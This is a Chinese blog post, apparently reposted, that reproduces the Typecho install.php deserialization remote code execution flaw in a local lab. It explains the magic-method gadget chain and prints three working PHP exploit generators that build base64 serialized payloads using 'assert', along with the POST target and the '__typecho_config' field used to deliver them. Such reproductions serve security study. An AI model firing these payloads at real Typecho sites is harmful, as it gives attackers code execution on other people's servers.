Typecho反序列化导致前台 getshell 漏洞复现

最新推荐文章于 2023-12-27 20:19:08 发布
最新推荐文章于 2023-12-27 20:19:08 发布
阅读量419 收藏 1
点赞数
文章标签: php shell python
原文链接:http://www.cnblogs.com/zhaijiahui/p/7763804.html
版权

Typecho反序列化导致前台 getshell 漏洞复现

 

漏洞描述:

Typecho是一款快速建博客的程序,外观简洁,应用广泛。这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行。

 

影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本

 

首先我还是记录一下敏感目录

http://127.0.0.1/typecho0.9/install.php

http://127.0.0.1/typecho0.9/install.php?finish&user=admin&password=admin

http://127.0.0.1/typecho0.9/admin/welcome.php

 

使用环境:

Phpstudy+win7虚拟机

Typecho_v1.0.14.tar.gz    https://pan.baidu.com/s/1jHQBKFk      (在里面找相应的名字)

 

漏洞成因:

Freebuf上的文章说的很清楚了,有两个需要理解的点:

第一个是__toString()魔法方法,在/install.php

__toString() //把类当作字符串使用时触发

 

这块利用Typecho_Db函数,跟进这个函数,/var/Typecho/Db.php,发现$adapterName定义的时候拼接了一个字符串,根据文章作者说,PHP是弱类型的语言,把一个字符串和一个类拼接的时候,会强制把类转换成字符串,所以就会触发传进来的这个类的toString方法。

第二个是__get()魔法方法,

__get() //用于从不可访问的属性读取数据

这块设置author由screenName确定,如果在类里面加上这个方法,我们给$item['author']设置的类中没有screenName私有属性就会执行该类的__get()方法。

通过__get()函数返回_applyFilter($value),将可执行代码赋值给$value触发漏洞。

 

 

漏洞复现过程:

 

这个漏洞复现就有一点坎坷了,起初我发现typecho里面有历史版本的下载,于是下载了一个0.9版本的,可是多次尝试仍以失败告终,后来在对比漏洞原理的时候,发现与存在漏洞的版本有出入,难不成历史版本作者也一直在更新。。。好吧,上网找了一个第三方的下了一个1.0.14,在报错的情况下完成了复现。

 

建站就不多说了,直接安装没有问题。安装成功如图

 

 

http://www.freebuf.com/vuls/152058.html

这位大牛漏洞原理讲的特别详细,建议看看。

反序列化漏洞要利用势必离不开魔术方法,作者收集的和PHP反序列化有关的PHP函数:
__wakeup() //使用unserialize时触发
__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发

 

Freebuf版EXP   http://www.freebuf.com/vuls/152058.html

 

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'phpinfo()';
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>
View Code

 

knownsec版EXP  https://paper.seebug.org/424/

 

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params['screenName'] = 'phpinfo()';
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));


knownsec版EXP  https://paper.seebug.org/424/
<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        // $this->_params['screenName'] = 'whoami';
        $this->_params['screenName'] = -1;
        $this->_filter[0] = 'phpinfo';
    }
}

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    /** 定义ATOM 1.0类型 */
    const ATOM1 = 'ATOM 1.0';
    /** 定义RSS时间格式 */
    const DATE_RFC822 = 'r';
    /** 定义ATOM时间格式 */
    const DATE_W3CDTF = 'c';
    /** 定义行结束符 */
    const EOL = "\n";
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = self::RSS2;
        $item['link'] = '1';
        $item['title'] = '2';
        $item['date'] = 1507720298;
        $item['author'] = new Typecho_Request();
        $item['category'] = array(new Typecho_Request());

        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'host' => 'localhost',
    'user' => 'xxxxxx',
    'charset' => 'utf8',
    'port' => '3306',
    'database' => 'typecho',
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo urlencode(base64_encode(serialize($a)));
?>
View Code

 

360安全客版EXP  http://bobao.360.cn/learning/detail/4610.html

 

<?php
class Typecho_Request
{
    private $_params = array('screenName'=>'eval(\'phpinfo();exit();\')');
    private $_filter = array('assert');
}
$payload1 = new Typecho_Request();
class Typecho_Feed
{
    private $_type = 'RSS 2.0';
    private $_items;
    public function __construct($x1)
    {
        $this->_items[] = array('author'=>$x1);
    }
}
$payload2 = new Typecho_Feed($payload1);
$exp['adapter'] = $payload2;
$exp['prefix'] = 'c1tas';
echo base64_encode(serialize($exp));
?>
View Code

 

用post提交数据

url:http://192.168.198.128/Typecho1.0/install.php?finish=

Postdata:__typecho_config=前面脚本生成的

Referrer:http://192.168.198.128/Typecho1.0/

 

另一种方式是通过cookie提交

 

 

转载于:https://www.cnblogs.com/zhaijiahui/p/7763804.html

weixin_30483697
关注
反序列化漏洞复现typecho
m0_56578216的博客
09-05 1040
将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类: 将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:同上,将这段利用代
Typecho CMS 反序列化漏洞(CVE-2018-18753)复现
玄道的网安博客
12-21 3267
简介 Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁 漏洞概述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 影响版本 typecho1.0(14.10.10) 环境搭建 下载typecho14.10.10 https://github.com/typecho/typecho/tags 按照顺序...
typecho反序列化漏洞复现
weixin_44005410的博客
05-21 1992
0x01前言 再杭州西湖线下打AWD的时候web1就是这个漏洞,在这里复现一下,刚好巩固一下前几天学习的反序列化漏洞。 0x02漏洞分析 这是一个由unserialize()导致的一个反序列化漏洞,全局搜索unserialize(),在install.php的232行发现 <?php $config = unserialize(base64_decode(Typecho_Cookie::...
Typecho 反序列化漏洞导致前台 getshell
weixin_38920945的博客
11-17 268
前言最早知道这个漏洞是在一个微信群里,说是install.php文件里面有个后门,看到别人给的截图一看就知道是个PHP反序列化漏洞,赶紧上服务器看了看自己的博客,发现自己也中招了,相关代码如下:然后果断在文件第一行加上了die:<?phpdie('404NotFound!');?>今天下午刚好空闲下来,就赶紧拿出来代码看看。漏洞分析先从install.ph...
Typecho-CMS反序列化任意代码执行漏洞分析和复现
weixin_43058307的博客
08-10 632
Typecho-CMS反序列化 代码审计 漏洞的入口出现在install.php //判断是否已经安装 if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) { exit; } // 挡掉可能的跨站请求 if (!empty($_GET) || !empty($_POST)) {
typecho_14.10.10反序列化漏洞复现
acdcccc的博客
09-05 146
typecho_14.10.10反序列化漏洞复现
记一次typecho反序列化漏洞复现(第一次写poc版)
m0_62100902的博客
06-28 2167
经过一系列的代码审计,终于找到一个可以利用的点,其余的属性全都是写死了的,也就是静态this的调用方式,而这里不是静态的,它可以是别的对象里面去调用这个属性,那么我们可以想到一种魔术方法:__get(),这个魔术方法是当对象中调用不存在的属性时候会自动去调用这个魔术方法,那么我们需要去找到一个既有__get()魔术方法的又没有screenName这个属性的对象(这里终于来点感觉了),继续在代码审计工具里面找__get()说一说我的个人理解吧。举个例子,php与java之间是如何相互传输的呢?
typecho cms 利用工具
07-30
typecho cms漏洞利用工具可以直接getshell 功能强大使用方便
Typecho代码审计-反序列化漏洞复现(超详细!!!)
最新发布
小小小屿屿屿的博客
12-27 2845
本文以Typecho为靶场,通过代码审计,复现反序列化漏洞
typecho反序列化漏洞原理及复现过程
wsnbbz的博客
03-04 1722
漏洞介绍 Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理 漏洞形成 由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞 漏洞利用 思路: 由于install.php代码验证了finish参数,请求头HTTP_HOST,po...
Typecho v1.1反序列化前台getshell漏洞分析
zzgslh的博客
01-18 1893
前言 什么是反序列化漏洞PHP反序列化漏洞是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成任意文件读取、代码执行、getshell等一系列不可控的严重后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但原理基本相通。 具体介绍参考下篇文章。 漏洞介绍 1.Typecho是一个由中国团队开发的开源跨平台博客程序。它基于PHP5构
[复现]蝉知cms 5.6 前台注入
weixin_30699741的博客
08-11 528
https://share.weiyun.com/5cbff06337d32a9748d0f1bead5ddbd5 前台注入 在/chanzhieps/system/module/cart/control.php页面的add函数 public function add($product, $count) { if($this->app->user-...
php反序列化漏洞 freebuf,Typecho反序列化漏洞导致前台getshell
weixin_39744384的博客
03-09 243
*本文原创作者:VIPKID安全团队,本文属FreeBuf原创奖励计划,未经许可禁止转载最早知道这个漏洞是在一个微信群里,说是install.php文件里面有个后门,看到别人给的截图一看就知道是个PHP反序列化漏洞,赶紧上服务器看了看自己的博客,发现自己也中招了,相关代码如下: 然后果断在文件第一行加上了die:今天下午刚好空闲下来,就赶紧拿出来代码看看。漏洞分析先从install.php开始跟,...
转载--Typecho install.php 反序列化导致任意代码执行
weixin_30843605的博客
11-20 459
转载--Typecho install.php 反序列化导致任意代码执行 原文链接(http://p0sec.net/index.php/archives/114/) 0x00 前言 漏洞公布已经过去一段时间了,当时只是利用了一下,并没有进行深度分析,现转载文章以便以后查看。 听说了这个洞,吓得赶紧去看了一下自己的博客,发现自己中招了,赶紧删除install目录。 恶意代码的...
Typecho install.php存在的反序列化漏洞
王三三
11-30 1678
0x00 前言很久没有在安全方面折腾,突然收到“爸爸云”的短信,“您的服务器xxx.xxx.xxx.xxx存在网站后门,为防止黑客进一步入侵,请登录进行查看和处理”。当时正在出差,手头没电脑,草草看了一眼没来得及处理,最近得空研究了研究。常在河边走,哪有不湿鞋,网上已经有该漏洞的详解,仅以此文记录对反序列化漏洞研究的一个学习过程。0x01 漏洞复现使用工具:1、Firefox浏览器+HackBar插
typecho install.phpl漏洞分析
le31ei的博客
12-06 891
漏洞出了很久了一直没时间分析,现在有空记录下分析流程,学习下php反序列化的知识。
Typecho猫咪插件打造可爱个性化博客
资源摘要信息:"卡哇伊猫咪Typecho插件是一个专门为Typecho博客系统定制开发的插件。Typecho是一个简洁高效的PHP博客程序,适合个人博客搭建。本插件的目的是为了在Typecho平台上增加美观可爱的猫咪元素,提升用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值